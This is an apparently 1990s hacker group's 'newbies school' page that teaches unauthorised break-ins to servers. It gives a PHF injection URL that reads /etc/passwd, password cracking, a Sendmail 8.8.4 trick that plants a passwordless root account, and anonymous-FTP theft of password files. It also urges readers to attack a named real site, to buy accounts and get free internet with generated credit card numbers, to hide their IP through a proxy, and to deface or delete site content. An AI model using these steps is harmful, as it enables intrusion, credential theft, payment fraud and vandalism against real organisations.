File areas         Hackerz chat      Memberzone    Newbies school
Hi and welcome to P.I.M.C newbie hackers school.
first you must remember theese:
* Exploit: a bug in a program that can be used to obtain something
* PASSWD File: the userbase file of unix/linux , this file is always located at /etc/passwd
* Shadow: type of encryption to the PASSWD file
* Shadowed Passwd: A PASSWD file that instead on the normal encryption there is a shadow encryption ->
                                   '*' or 'x' or '!' in the password slot, a Shadowed PASSWD file  = FAKE
* Shadow File: the file that contains the real passwords for the useres in the Shadowed Passwd,
                         deafult location : /etc/shadow
* Proxy: a server that can be used to disguise the hacker's IP adress
* Wingate: type of proxy server.
* Shell Account: username & password in the site's ftp
 

ok, now we'll start with some simple exploits

the PHF exploit
------------------
the PHF is a file that located in the /cgi-bin directory of the site (most of the sites already removed it), this file has a exploit
that can obtain access to files, hackers usually use it to reach the real PASSWD file.
Example: how to activate the PHF exploit: http://www.target_site.com/phf?Qalias=x%0a/bin/cat%20/etc/passwd
this will give you a normal-encryption passwd file.
 

Welcome to trainning mission I , your mission is to get the passwd file of  WWW.AFP.ORG , good luck.
what are you waiting for?! , go hack it!!!
ok, after you succeeded trainning mission I , you need to leech the passwords from the PASSWD file,
to do this you need to get a program called John The Ripper, after you got it, use this command line to leech
the passwords from the PASSWD file:
john -pwfile:PASSWD -stdin , this will take alot of time so i sujest you leave your computer all night long to hack it.
if john found a password he will write something this:

the_password_he_find         (the_username_for_the_password)

welp, congratulations, you finished your first exploit!!
 

SENDMAIL 8.8.4 exploit
-----------------------------
The SENDMAIL 8.8.4 is a program that installed on Port 25 of the sever (you can check if it exist of the target site by
running throw Windows95 this: 'telnet www.target.com 25' , if in the first line that appears there is a 'SENDMAIL 8.8.4',
that means that the program is installed on the server, now after you checked if the program is installed, you MUST have
a shell account on the server (try to 'buy' one with a credit card generator) , after you get the shell account you need 2 do
this:  first get in port 23 on the server - telnet www.target.com 23 , this is the 'telnet' port, now when it will ask for
username type your username (from the shell you bought) , and after it type your password, now, if it will give you
a command prompt, your in!! , now you need to type this:
 'ln /etc/passwd /var/tmp/dead.letter'
ok, after you type it get out of port 23 and get into port 25 agian,
now , send this messy:


mail from: bullshit@unexisten_host.com
rcpt to: bullshit@unexisten_host.com
data
pimc::0:0:leet shit:/root:/bin/bash
.
quit

after you sent this messy, go to Port23 , then in the username type 'PIMC' , and in the password just press enter,
and now you are in the server, with your own SUPERUSER shell account, you can do whatever you want!!!
(delete stuff - lame/change the site and write credits 2 yourself/upload shit/what-ever)
Trainning mission II , found a site that is using SENDMAIL 8.8.5 and get a SUPERUSER there
what are you waiting for?!
 

The Simplest Hacking Method
----------------------------------
Get into the site (port 21) , then write theese commands:
* User anonymous
* Pass [email protected]
now you supose to be on the sever, now type theese commands:
* cmd /etc
* retr passwd
now you are downloading the passwd file, now you need to check if it is shadowed, if its not then just crack it with
cracker jack...
 
 

How do disguise your IP adress
------------------------------------
this is disguise instuctions for use in Windows95, here is what you do:
Press on Start -> config -> control panel
now when you are in the control panel, press on Internet, when the window appears,  press on 'Connections' , now
you will see a 'Proxy server' box, in the box, mark 'x' on the 'connect
through a proxy server' , now press on the settings button, now,
mark with 'x' the 'Use the same proxy server for all protocols'
now, type in the HTTP box the proxy server and in his PORT box type
8080 , now press on OK and all the places you will connect to will get
the Proxy's IP adress.
here is a proxy you can use:
bcproxy.ac.il:8080 - israely university

 

Ok, now im a medium hacker, but my internet bill is HHUUGGEE , what should i do?!
--------------------------------------------------------------------------------------------------
ok, now you gotta do yourself a Free Internet Account (FIA) , the thing that i will tell u now will work on most of the
world's countrys ,  go into www.ibm.net, now press on Registration Center , now go down the screen and search for
'Online Registration Process' , after you press on it, it will obtain you access to the userbase file (to add a user)
first, select your country (it must be NOT fake) , now everything you will write is totally fake!! (exept the credit card - there
you gotta use a credit card generator)  ,  after your done ask someone for the IBM number in your country and just call them
with your Internet connection program (or download one from their site) , welp , free internet =)  ,  gotta go <'ya

 
 
 
 
 
 
 
CONGRATULATIONS!!! YOU ARE NOT A NEWBIE ANYMORE!!!
YOU HACKED TWO SITES, YOU ARE IN A GOOD PLACE IN THE MIDDLE!
Advice for more learnning: scan for .c scripts & more exploits.
this area has been writen by aCCESS^dEN|ED
Leader of the P.I.M.C group